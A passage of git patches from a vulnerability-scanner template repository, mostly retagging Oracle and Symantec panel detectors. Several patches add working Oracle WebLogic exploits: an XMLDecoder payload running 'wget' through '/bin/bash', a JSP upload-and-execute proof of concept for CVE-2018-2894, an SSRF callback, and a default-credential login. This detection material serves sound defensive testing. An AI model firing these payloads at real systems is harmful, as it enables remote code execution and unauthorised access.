b/exposed-panels/symantec-ewep.yaml index 6891d66808..517d468a5c 100644 --- a/exposed-panels/symantec-ewep.yaml +++ b/exposed-panels/symantec-ewep.yaml @@ -17,6 +17,7 @@ requests: words: - "Symantec Corporation. All Rights Reserved" part: body + - type: status status: - 200 From 11ae38bd01984b5696ac58d21df28356174fde3a Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Sun, 12 Sep 2021 15:45:30 +0300 Subject: [PATCH 2157/4083] #2636, Add the takeover tag to the template The template indicates a possible subdomain takeover vulnerability, therefore it should have the takeover tag. --- dns/servfail-refused-hosts.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index 99fabbc4f5..21722ac4c7 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -4,7 +4,7 @@ info: name: Servfail Host Finder author: pdteam severity: info - tags: dns + tags: dns,takeover dns: - name: "{{FQDN}}" From e6d97e26c5e9223090763b3dabc272501f0e9aeb Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 18:31:46 +0530 Subject: [PATCH 2158/4083] additional matcher --- cves/2020/CVE-2020-2551.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index 348fd0ba52..47f08247f8 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -28,6 +28,7 @@ requests: - method: GET path: - "{{BaseURL}}/console/login/LoginForm.jsp" + matchers-condition: and matchers: - type: word @@ -38,6 +39,12 @@ requests: - "12.2.1.4" condition: or part: body + + - type: word + words: + - "WebLogic" + part: body + - type: status status: - 200 From 0436e97c0e41503b2e573c84609f677b364400ef Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 18:32:24 +0530 Subject: [PATCH 2159/4083] payload update to work on both platform --- cves/2017/CVE-2017-10271.yaml | 54 ++++++++++++++--------------------- 1 file changed, 21 insertions(+), 33 deletions(-) diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 1e9b5d37af..16be3163ce 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - tags: cve,cve2017,rce,oracle,weblogic + tags: cve,cve2017,rce,oracle,weblogic,oob classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.50 @@ -24,37 +24,25 @@ requests: Content-Type: text/xml - + - - - - 0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034 - - - - com.supeream.exploits.XmlExp - - - - cat /etc/passwd - + + + + + + /bin/bash - - - - - - - - - - - - + + -c - - + + wget {{interactsh-url}} + + + @@ -62,7 +50,7 @@ requests: matchers: - - type: regex - regex: - - 'root:.*:0:0' - part: body + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 4337232f6e1969bebf85ad2c6519990fef3479e6 Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Sun, 12 Sep 2021 17:14:20 +0300 Subject: [PATCH 2160/4083] #2636, Remove takeover tag from template --- dns/can-i-take-over-dns.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml index fb4f8b6520..d8e4b48d41 100644 --- a/dns/can-i-take-over-dns.yaml +++ b/dns/can-i-take-over-dns.yaml @@ -4,7 +4,7 @@ info: name: Can I Take Over DNS - Fingerprint author: pdteam severity: info - tags: dns,ns,takeover + tags: dns,ns reference: https://github.com/indianajson/can-i-take-over-dns dns: From 35e8c3c1cf61b898ac365b21321b8ddbf107dff5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 19:50:30 +0530 Subject: [PATCH 2161/4083] Added complete poc --- cves/2018/CVE-2018-2894.yaml | 84 ++++++++++++++++++++++++++++++++---- 1 file changed, 75 insertions(+), 9 deletions(-) diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index a192dae23d..c89db2db55 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -2,25 +2,91 @@ id: CVE-2018-2894 info: name: Oracle WebLogic RCE - author: geeknik + author: geeknik,pdteam description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. - reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ severity: critical tags: cve,cve2018,oracle,weblogic,rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2018-2894 + reference: + - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 requests: - - method: GET - path: - - "{{BaseURL}}/ws_utc/config.do" + - raw: + - | + POST /ws_utc/resources/setting/options HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 + + - | + POST /ws_utc/resources/setting/keystore HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_name" + + {{randstr}} + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_edit_mode" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_front" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_changed" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" + Content-Type: application/octet-stream + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + + <% + String cve = "CVE-2018-2894"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + ------WebKitFormBoundaryuim0dyiDSPBPu31g-- + + - | + GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: id + internal: true + group: 1 + regex: + - '([0-9]+){{randstr}}' - redirects: true matchers: - type: word words: - - "* Copyright (c) 2005,2013, Oracle" - - "settings" - condition: and \ No newline at end of file + - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) From 29a944ea73c86a2ed3d8f8c46b82c04b5e155b71 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:22:03 +0530 Subject: [PATCH 2162/4083] payload update --- cves/2014/CVE-2014-4210.yaml | 11 ++++------- cves/2020/CVE-2020-14882.yaml | 1 + 2 files changed, 5 insertions(+), 7 deletions(-) diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index 42932519fa..df8ec6f136 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -4,7 +4,7 @@ info: name: Weblogic SSRF in SearchPublicRegistries.jsp author: princechaddha severity: medium - tags: cve,cve2014,weblogic,oracle,ssrf + tags: cve,cve2014,weblogic,oracle,ssrf,oob reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700" + - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}" matchers-condition: and matchers: @@ -22,9 +22,6 @@ requests: - 200 - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "Connection refused" - - "Socket Closed" - - "content-type: unknown/unknown" - part: body - condition: or + - "http" diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 50635623d5..382be20081 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -47,6 +47,7 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + - type: status status: - 200 \ No newline at end of file From e831dd4fe0f27a10d48c62875f566c9504e4b6bf Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:45:49 +0530 Subject: [PATCH 2163/4083] lint error fix --- cves/2018/CVE-2018-2894.yaml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index c89db2db55..c5c306ce1f 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -20,45 +20,45 @@ requests: POST /ws_utc/resources/setting/options HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 - | POST /ws_utc/resources/setting/keystore HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g - + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_name" - + {{randstr}} ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_edit_mode" - + false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_front" - - + + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password" - - + + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_changed" - + false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" Content-Type: application/octet-stream - + <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> - + <% String cve = "CVE-2018-2894"; MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); + alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); @@ -69,7 +69,7 @@ requests: if(hx.length() == 1){hx = "0" + hx;} hashedpasswd.append(hx); } - + out.println(hashedpasswd.toString()); %> ------WebKitFormBoundaryuim0dyiDSPBPu31g-- From b46cd37b47faf475a87c23216dd353f07e521fc2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:53:13 +0530 Subject: [PATCH 2164/4083] Added default weblogic login --- .../weblogic/weblogic-default-login.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 default-logins/weblogic/weblogic-default-login.yaml diff --git a/default-logins/weblogic/weblogic-default-login.yaml b/default-logins/weblogic/weblogic-default-login.yaml new file mode 100644 index 0000000000..310ae8dbb3 --- /dev/null +++ b/default-logins/weblogic/weblogic-default-login.yaml @@ -0,0 +1,35 @@ +id: weblogic-default-login + +info: + name: WebLogic default login + author: pdteam + severity: high + tags: default-login,weblogic + reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/weak_password + +requests: + - raw: + - | + GET /console/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/console/index.jsp" + - "ADMINCONSOLESESSION" + condition: and + + - type: status + status: + - 302 \ No newline at end of file From f092d5dab7fd9850b0256284354d5f567aabe64e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:26:20 +0530 Subject: [PATCH 2165/4083] Update CVE-2010-2037.yaml --- cves/2010/CVE-2010-2037.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml index 9a9b24c3e6..e3db0ee030 100644 --- a/cves/2010/CVE-2010-2037.yaml +++ b/cves/2010/CVE-2010-2037.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/34005 - https://www.cvedetails.com/cve/CVE-2010-2037 - tags: cve,cve2010,lfi + tags: cve,cve2010,lfi,joomla requests: - method: GET From 6975422e79c07d7e461784fc759da81f32b693f4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:27:22 +0530 Subject: [PATCH 2166/4083] Update oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml index 04d90cc407..473e0db989 100644 --- a/exposed-panels/oracle-business-control.yaml +++ b/exposed-panels/oracle-business-control.yaml @@ -4,9 +4,8 @@ info: name: Oracle Commerce Business Control Center author: dhiyaneshDk severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 requests: - method: GET From 59c91400c6e069cb58b34d9e6bb4b045e994ffe2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:27:48 +0530 Subject: [PATCH 2167/4083] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 8a61b0ea64..3068208fab 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -5,8 +5,7 @@ info: author: dhiyaneshDk severity: info tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 requests: - method: GET From a90f10a4200234846a97ebfb195710d951593fa7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:24 +0530 Subject: [PATCH 2168/4083] Update oracle-people-enterprise.yaml --- exposed-panels/oracle-people-enterprise.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml index eba64c8a2a..8f732871c5 100644 --- a/exposed-panels/oracle-people-enterprise.yaml +++ b/exposed-panels/oracle-people-enterprise.yaml @@ -4,9 +4,8 @@ info: name: Oracle Peoplesoft Enterprise author: dhiyaneshDk severity: info - tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + tags: oracle,login,panel requests: - method: GET From bbde06af581fa99e7ca6453115718e97e3a5d155 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:33 +0530 Subject: [PATCH 2169/4083] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 3068208fab..c18a630cb9 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -4,7 +4,7 @@ info: name: Oracle(R) Integrated Lights Out Manager author: dhiyaneshDk severity: info - tags: oracle,login + tags: oracle,login,panel reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 requests: From 4a68ea4346d29b4610085d31d03547c26b208580 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:44 +0530 Subject: [PATCH 2170/4083] Update oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml index 473e0db989..e5c490c80e 100644 --- a/exposed-panels/oracle-business-control.yaml +++ b/exposed-panels/oracle-business-control.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 - tags: oracle,login + tags: oracle,login,panel requests: - method: GET From 64df660fd6a81feca2cee877b06be9d6a45c6832 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:15:21 +0530 Subject: [PATCH 2171/4083] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index c18a630cb9..4df36b9b46 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - 'Oracle(R) Integrated Lights Out Manager - Login' + part: body - type: status status: From 716a9a0a6db44e486ed526ff810d1c5e2f5214a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:15:54 +0530 Subject: [PATCH 2172/4083] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 4df36b9b46..13aa0c5c1b 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -4,8 +4,8 @@ info: name: Oracle(R) Integrated Lights Out Manager author: dhiyaneshDk severity: info - tags: oracle,login,panel reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + tags: oracle,login,panel requests: - method: GET From abaac750f928a47b03278ee8bebae9ce41ffe52c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:19:01 +0530 Subject: [PATCH 2173/4083] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 13aa0c5c1b..c87585cf6e 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -22,3 +22,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'id="hostname">([a-z0-9-]+)<\/span><\/td>' From 4512b1c88a67220afd4060b55661abfc8f709d75 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:34:36 +0530 Subject: [PATCH 2174/4083] Update and rename symantec-ewep.yaml to symantec-ewep-detect.yaml --- .../{symantec-ewep.yaml => symantec-ewep-detect.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposed-panels/{symantec-ewep.yaml => symantec-ewep-detect.yaml} (75%) diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep-detect.yaml similarity index 75% rename from exposed-panels/symantec-ewep.yaml rename to exposed-panels/symantec-ewep-detect.yaml index 517d468a5c..f735ab3604 100644 --- a/exposed-panels/symantec-ewep.yaml +++ b/exposed-panels/symantec-ewep-detect.yaml @@ -1,10 +1,10 @@ -id: symantec-ewep +id: symantec-ewep-detect info: - name: Detect Symantec Encryption Web Email Protection + name: Symantec Encryption Web Email Protection Detect author: johnk3r severity: info - tags: panel + tags: panel,symantec requests: - method: GET From f1f59f6fe5fb9fb6c3d727e62879af216a66bc33 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:44:14 +0530 Subject: [PATCH 2175/4083] Create symantec-endpoint-manager.yaml --- .../symantec/symantec-endpoint-manager.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-endpoint-manager.yaml diff --git a/exposed-panels/symantec/symantec-endpoint-manager.yaml b/exposed-panels/symantec/symantec-endpoint-manager.yaml new file mode 100644 index 0000000000..f90d195530 --- /dev/null +++ b/exposed-panels/symantec/symantec-endpoint-manager.yaml @@ -0,0 +1,24 @@ +id: symantec-endpoint-manager + +info: + name: Symantec Endpoint Protection Manager + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + tags: symantec,panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Endpoint Protection Manager" + part: body + + - type: status + status: + - 200 From 2478812b3fa8fab9651fbcae64ec1b18e40d32de Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:46:25 +0530 Subject: [PATCH 2176/4083] Update and rename exposed-panels/symantec-ewep-detect.yaml to exposed-panels/symantec/symantec-ewep-detect.yaml --- exposed-panels/{ => symantec}/symantec-ewep-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/{ => symantec}/symantec-ewep-detect.yaml (74%) diff --git a/exposed-panels/symantec-ewep-detect.yaml b/exposed-panels/symantec/symantec-ewep-detect.yaml similarity index 74% rename from exposed-panels/symantec-ewep-detect.yaml rename to exposed-panels/symantec/symantec-ewep-detect.yaml index f735ab3604..7461ae8a06 100644 --- a/exposed-panels/symantec-ewep-detect.yaml +++ b/exposed-panels/symantec/symantec-ewep-detect.yaml @@ -4,7 +4,7 @@ info: name: Symantec Encryption Web Email Protection Detect author: johnk3r severity: info - tags: panel,symantec + tags: panel,symantec,login requests: - method: GET @@ -15,7 +15,7 @@ requests: matchers: - type: word words: - - "Symantec Corporation. All Rights Reserved" + - "Symantec Encryption Server: Web Email Protection - Login" part: body - type: status From fc041660f7610265b9287b45a956239430dc2c05 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:47:12 +0530 Subject: [PATCH 2177/4083] Update and rename symantec-endpoint-manager.yaml to symantec-epm-login.yaml --- .../{symantec-endpoint-manager.yaml => symantec-epm-login.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/symantec/{symantec-endpoint-manager.yaml => symantec-epm-login.yaml} (94%) diff --git a/exposed-panels/symantec/symantec-endpoint-manager.yaml b/exposed-panels/symantec/symantec-epm-login.yaml similarity index 94% rename from exposed-panels/symantec/symantec-endpoint-manager.yaml rename to exposed-panels/symantec/symantec-epm-login.yaml index f90d195530..4b06e8b789 100644 --- a/exposed-panels/symantec/symantec-endpoint-manager.yaml +++ b/exposed-panels/symantec/symantec-epm-login.yaml @@ -1,4 +1,4 @@ -id: symantec-endpoint-manager +id: symantec-epm-login info: name: Symantec Endpoint Protection Manager From 25037e4bb68b3727ae36fa6d1c5c22683320af1d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:47:36 +0530 Subject: [PATCH 2178/4083] Update and rename symantec-ewep-detect.yaml to symantec-ewep-login.yaml --- .../{symantec-ewep-detect.yaml => symantec-ewep-login.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/symantec/{symantec-ewep-detect.yaml => symantec-ewep-login.yaml} (82%) diff --git a/exposed-panels/symantec/symantec-ewep-detect.yaml b/exposed-panels/symantec/symantec-ewep-login.yaml similarity index 82% rename from exposed-panels/symantec/symantec-ewep-detect.yaml rename to exposed-panels/symantec/symantec-ewep-login.yaml index 7461ae8a06..954f4b1e22 100644 --- a/exposed-panels/symantec/symantec-ewep-detect.yaml +++ b/exposed-panels/symantec/symantec-ewep-login.yaml @@ -1,7 +1,7 @@ -id: symantec-ewep-detect +id: symantec-ewep-login info: - name: Symantec Encryption Web Email Protection Detect + name: Symantec Encryption Web Email Protection author: johnk3r severity: info tags: panel,symantec,login From 9da0058ecda05a2a6558c13e199d795fad37270b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:51:15 +0530 Subject: [PATCH 2179/4083] Create symantec-dlp-login.yaml --- .../symantec/symantec-dlp-login.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/symantec/symantec-dlp-login.yaml diff --git a/exposed-panels/symantec/symantec-dlp-login.yaml b/exposed-panels/symantec/symantec-dlp-login.yaml new file mode 100644 index 0000000000..5034c5453c --- /dev/null +++ b/exposed-panels/symantec/symantec-dlp-login.yaml @@ -0,0 +1,24 @@ +id: symantec-dlp-login + +info: + name: Symantec Data Loss Prevention + 